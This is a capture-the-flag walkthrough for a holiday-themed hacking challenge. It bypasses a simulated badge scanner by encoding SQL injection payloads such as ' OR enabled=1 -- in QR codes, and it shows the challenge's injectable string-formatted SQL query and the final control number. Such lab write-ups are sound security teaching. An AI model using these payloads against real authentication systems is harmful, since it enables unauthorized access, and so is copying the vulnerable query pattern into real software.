Bypass the authentication mechanism associated with the room near Pepper Minstix. A sample employee badge is available. What is the access control number revealed by the door authentication panel?
For hints on achieving this objective, please visit Pepper Minstix and help her with the Yule Log Analysis Cranberry Pi terminal challenge.
Barcode Creation hint from
Creating QR barcodes
SQL Injection hint from
SQL Injection
All of the Kringle Castle employees have these cool cards with QR codes on them that give us access to restricted areas.
Unfortunately, the badge-scan-o-matic said my account was disabled when I tried scanning my badge.
I really needed access so I tried scanning several QR codes I made from my phone but the scanner kept saying "User Not Found".
I researched a SQL database error from scanning a QR code with special characters in it and found it may contain an injection vulnerability.
I was going to try some variations I found on OWASP but decided to stop so I don't tick-off Alabaster.
Opening Scan-O-Matic presents with a terminal, which allows to upload QR code images.
Let's install qrcode
to generate QR images.
pip install qrcode pillow
Trying simple 1234
results in NO AUTHORIZED USER ACCOUNT FOUND!
qrcode 1234 > qr.png
Trying simple SQL injection reveals much information.
qrcode "'" > qr.png
EXCEPTION AT (LINE 96 \"user_info = query(\"SELECT first_name,last_name,enabled FROM employees WHERE authorized = 1 AND uid = '{}' LIMIT 1\".format(uid))\"): (1064, u\"You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''' LIMIT 1' at line 1\")
Therefore, it can be assumed that Python code with SQL query in backend looks like this:
user_info = query("SELECT first_name,last_name,enabled FROM employees WHERE authorized = 1 AND uid = '{}' LIMIT 1".format(uid))
Trying standard SQL injection ' OR '1'='1
returns Authorized User Account Has Been Disabled!
qrcode "' OR '1'='1" > qr.png
That means that user was selected with enabled
as 0
. Let's fix that by more intelligent SQL injection, like ' OR enabled=1 --
.
qrcode "' OR enabled=1 -- " > qr.png
Success! Terminal returns User Access Granted - Control number 19880715
.
Answer to this objective is 19880715.
Die Hard (1988) ... It was released on July 15, 1988.